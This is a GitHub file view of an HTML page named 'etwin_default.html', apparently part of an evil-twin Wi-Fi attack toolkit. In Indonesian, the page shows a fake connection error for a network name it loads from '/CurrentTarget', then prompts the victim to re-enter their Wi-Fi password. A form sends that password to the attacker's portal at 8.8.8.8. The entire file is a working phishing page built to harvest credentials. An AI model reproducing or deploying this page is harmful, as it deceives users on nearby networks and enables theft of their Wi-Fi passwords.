-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathetwin_default.html
More file actions
87 lines (76 loc) · 2.22 KB
/
Copy pathetwin_default.html
File metadata and controls
87 lines (76 loc) · 2.22 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
<!DOCTYPE html>
<!-- saved from url=(0028)http://8.8.8.8/etwin_default -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title id="TARGET">Wi-Fi</title>
<meta name="viewport" content="width=device-width,initial-scale=1">
<style>
article {
background: #f2f2f2;
padding: 1.3em;
}
body {
color: #333;
font-family: Century Gothic, sans-serif;
font-size: 18px;
line-height: 24px;
margin: 0;
padding: 0;
}
div {
padding: 0.5em;
}
h1 {
margin: 0.5em 0 0 0;
padding: 0.5em;
line-height: 1.0;
}
h2 {
margin: 0.5em 0 0 0;
padding: 0.5em;
color: red
}
input {
width: 100%;
padding: 9px 10px;
margin: 8px 0;
box-sizing: border-box;
border-radius: 0;
border: 1px solid #555555;
}
label {
color: #333;
display: block;
font-style: italic;
font-weight: bold;
}
nav {
background: #0066ff;
color: #fff;
display: block;
font-size: 1.3em;
padding: 1em;
}
nav b {
display: block;
font-size: 1.5em;
margin-bottom: 0.5em;
}
textarea {
width: 100%;
}
</style>
<style>undefined</style></head>
<body style="background-color: white;"> <nav> <b id="SSID">Infinix</b> <p>Error 509 : Sambungan Wi-Fi gagal.</p> </nav> <div> <h1>Masukkan ulang password</h1> </div> <div> <div>Masukkan password Wi-Fi untuk melanjutkan.</div> <div> <form action="http://8.8.8.8/"> <b>Password</b> <center> <input type="password" name="password" minlength="8"> <input type="submit" value="Lanjutkan"> </center> </form> </div> <div class="q"> <a>All rights reserved 2026</a>
</div>
</div>
<script>
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200) {
document.getElementById("SSID").innerHTML = this.responseText
}
}
xhttp.open("GET", "/CurrentTarget", true);
xhttp.send();
</script>
</body></html>